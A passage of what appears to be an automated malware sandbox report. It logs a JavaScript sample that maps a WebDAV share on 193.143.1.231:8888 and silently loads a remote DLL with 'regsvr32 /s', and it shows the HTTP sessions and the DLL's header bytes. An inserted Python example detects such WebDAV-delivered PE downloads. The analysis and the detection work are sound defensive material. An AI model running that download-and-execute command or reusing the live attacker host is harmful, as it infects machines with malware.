                Dec 17, 2024 15:11:16.532362938 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.538038969 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.538085938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.538101912 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.543967962 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.544008017 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.544028044 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.549834967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.549873114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.549899101 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.555644989 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.555682898 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.555716991 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.555733919 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.555777073 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.561513901 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.561557055 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.561616898 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.567183018 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.570080042 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.570116997 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.570147991 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.575835943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.575875044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.575908899 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.581511974 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.581549883 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.581573963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.581583977 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.581631899 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.587111950 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.587203026 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.587260962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.592817068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.592869043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.592928886 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.598395109 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.598453999 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.598505020 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.603889942 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.603913069 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.603929043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.603961945 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.609345913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.609369040 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.609410048 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.614784956 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.614809036 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.614856005 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.620229006 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.620250940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.620286942 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.625679016 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.625701904 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.625745058 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.631649971 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.631669044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.631697893 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.631720066 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.631758928 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.636342049 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.636384964 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.636430979 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.641630888 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.641652107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.641702890 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.646955967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.646980047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.647048950 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.652234077 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.652256966 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.652271986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.652318001 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.657434940 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.657455921 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.657496929 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.662383080 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.662403107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.662442923 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.667481899 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.667503119 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.667551041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.672575951 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.672597885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.672612906 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.672661066 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.672702074 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.677619934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.677642107 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.677742958 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.682670116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.682689905 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.682761908 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.687599897 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.690141916 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.690164089 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.690229893 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.695210934 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.695235014 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.695311069 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.700045109 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.700078964 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.700124979 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.704978943 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.705017090 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.705049992 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.705049992 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.705142021 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:16.709984064 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:16.758315086 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:32.688664913 CET | 8888 | 49705 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:32.688749075 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:32.688838005 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:32.808454037 CET | 8888 | 49705 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:36.827694893 CET | 8888 | 49706 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:36.827805996 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:36.827982903 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:36.947772980 CET | 8888 | 49706 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:38.691781044 CET | 8888 | 49707 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:38.691894054 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:38.691981077 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:38.811532974 CET | 8888 | 49707 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:41.988157034 CET | 8888 | 49708 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:41.988291979 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:41.988373041 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:42.107981920 CET | 8888 | 49708 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:43.653124094 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                Dec 17, 2024 15:11:43.653194904 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:43.653248072 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
                Dec 17, 2024 15:11:43.773118019 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
                • 193.143.1.231:8888
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49704 | 193.143.1.231 | 8888 | 4832 | C:\Windows\System32\net.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:02.332396984 CET | 107 | OUT | OPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:03.779273987 CET | 223 | IN | HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:03 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.5 | 49705 | 193.143.1.231 | 8888 | - | -
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:07.183607101 CET | 137 | OUT | OPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:08.594680071 CET | 223 | IN | HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:08 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.5 | 49706 | 193.143.1.231 | 8888 | - | -
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:10.288436890 CET | 692 | IN | HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:10 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 4d 6f 6e 2c 20 31 36 20 44 65 63 20 32 30 32 34 20 31 32 3a 31 33 3a 32 31 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname></D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.5 | 49707 | 193.143.1.231 | 8888 | - | -
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:11.848124981 CET | 692 | IN | HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:11 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 4d 6f 6e 2c 20 31 36 20 44 65 63 20 32 30 32 34 20 31 32 3a 31 33 3a 32 31 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:displayname></D:displayname><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.5 | 49708 | 193.143.1.231 | 8888 | - | -
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:13.516463041 CET | 854 | IN | HTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:13 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 682
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 31 34 30 33 34 31 36 32 35 36 32 33 38 36 33 2e 64 6c 6c 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 34 31 38 38 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 37 20 44 65 63 20 32 30 32 34 20 31 34 3a 31 30 3a 32 32 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 67 65 74 65 74 61 67 3e 22 31 38 31 31 66 63 33 31 64 63 62 66 33 65 39 30 36 36 34 30 30 22 3c 2f 44 3a 67 65 74 65 74 61 67 3e 3c 44 3a 73 75 70 70 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/140341625623863.dll</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:getcontentlength>418816</D:getcontentlength><D:getlastmodified>Tue, 17 Dec 2024 14:10:22 GMT</D:getlastmodified><D:getetag>"1811fc31dcbf3e9066400"</D:getetag><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>140341625623863.dll</D:displayname><D:getcontenttype>application/octet-stream</D:getcontenttype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.5 | 49709 | 193.143.1.231 | 8888 | - | -
                Timestamp | Bytes transferred | Direction | Data
                Dec 17, 2024 15:11:13.641015053 CET | 195 | OUT | GET /140341625623863.dll HTTP/1.1
                Cache-Control: no-cache
                Connection: Keep-Alive
                Pragma: no-cache
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:15.072145939 CET | 1236 | IN | HTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 418816
                Connection: keep-alive
                Accept-Ranges: bytes
                Etag: "1811fc31dcbf3e9066400"
                Last-Modified: Tue, 17 Dec 2024 14:10:22 GMT
                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdQag" `W.text `.rdatax@@.data@.pdatab@@

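The six sessions above show the Windows WebDAV redirector (User-Agent DavClnt, then Microsoft-WebDAV-MiniRedir) probing 193.143.1.231:8888 with OPTIONS and PROPFIND and then fetching /140341625623863.dll, whose body starts with an MZ header and a "PE\0\0" signature at offset 0x78. The following is an added example, not Joe Sandbox's code and not anything from the sample: it validates a captured body prefix as a PE image (DOS header, PE signature, COFF header, optional-header magic) and flags WebDAV traffic on a non-standard port that delivers one. DLL_PREFIX is copied from the start of the session 5 response exactly as the report prints it; the flow records are constructed from the sessions above, and the PROPFIND method on sessions 2 to 4 is an assumption drawn from their 207 Multi-Status replies, since only the responses of those sessions appear in the capture (their User-Agent is therefore left empty).

```python
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

# First 0x92 bytes of the session 5 response body, transcribed from the report.
DLL_PREFIX = bytes.fromhex(
    "4d5a7800 01000000 04000000 00000000"   # 0x00: 'MZ', e_cblp, e_cp ...
    "00000000 00000000 40000000 00000000"   # 0x10: e_lfarlc = 0x40
    "00000000 00000000 00000000 00000000"   # 0x20
    "00000000 00000000 00000000 78000000"   # 0x30: e_lfanew = 0x78
    "0e1fba0e 00b409cd 21b8014c cd21"       # 0x40: DOS stub code
) + b"This program cannot be run in DOS mode.$\x00\x00" + bytes.fromhex(
    "50450000"                              # 0x78: 'PE\0\0'
    "6486 0400 19516167 00000000 00000000"  # Machine, NumberOfSections, TimeDateStamp, symbol ptr/count
    "f000 2220"                             # SizeOfOptionalHeader, Characteristics (0x2000 = DLL)
    "0b02"                                  # optional header Magic, 0x20b = PE32+
)
# Start of the 207 bodies in sessions 2-4, as printed above.
XML = b'<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:">'
MINIREDIR = "Microsoft-WebDAV-MiniRedir/10.0.19045"
WEBDAV_UAS = ("DavClnt", "Microsoft-WebDAV-MiniRedir")


@dataclass(frozen=True)
class PeSummary:
    machine: int
    sections: int
    timestamp: datetime
    is_dll: bool
    pe32plus: bool


def parse_pe_prefix(data):
    """Validate DOS header, PE signature, COFF header and optional-header magic.
    Needs only e_lfanew + 26 bytes, so it works on the first packet of a download.
    Returns None when the bytes are not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsec, ts, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return PeSummary(machine, nsec, datetime.fromtimestamp(ts, timezone.utc),
                     bool(chars & 0x2000), magic == 0x20B)


@dataclass(frozen=True)
class HttpFlow:
    session: int
    dst_port: int
    method: str
    path: str
    user_agent: str
    status: int
    body_prefix: bytes


# Constructed from the sessions above; method/UA of sessions 2-4 are assumptions.
SAMPLE_FLOWS = [
    HttpFlow(0, 8888, "OPTIONS", "/", "DavClnt", 200, b""),
    HttpFlow(1, 8888, "OPTIONS", "/", MINIREDIR, 200, b""),
    HttpFlow(2, 8888, "PROPFIND", "/", "", 207, XML),
    HttpFlow(3, 8888, "PROPFIND", "/", "", 207, XML),
    HttpFlow(4, 8888, "PROPFIND", "/140341625623863.dll", "", 207, XML),
    HttpFlow(5, 8888, "GET", "/140341625623863.dll", MINIREDIR, 200, DLL_PREFIX),
]


def classify(flow):
    """Rule names a single request/response pair trips, in evaluation order."""
    hits = []
    # 207 Multi-Status and PROPFIND only exist in WebDAV, so they identify the
    # protocol even when the client's User-Agent was not captured.
    webdav = (flow.user_agent.startswith(WEBDAV_UAS) or flow.status == 207
              or flow.method == "PROPFIND")
    if webdav and flow.dst_port not in (80, 443):
        hits.append("webdav_on_nonstandard_port")
    pe = parse_pe_prefix(flow.body_prefix)
    if flow.method == "GET" and flow.status == 200 and pe is not None:
        hits.append("pe_image_over_webdav" if webdav else "pe_image_download")
        if pe.is_dll and flow.path.lower().endswith(".dll"):
            hits.append("dll_served_for_remote_load")
    return hits


def analyze(flows):
    """Map session id -> rule hits for every flow that tripped at least one rule."""
    result = {}
    for flow in flows:
        hits = classify(flow)
        if hits:
            result[flow.session] = hits
    return result
```

The COFF TimeDateStamp in the captured prefix (0x67615119) decodes to 2024-12-17 10:23:21 UTC, a few hours before the Last-Modified header the server returns for the same file, which is the kind of build-freshness indicator worth recording alongside the hash when tracking a campaign.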


                Target ID:0
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
                Imagebase:0x7ff75c990000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:1
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
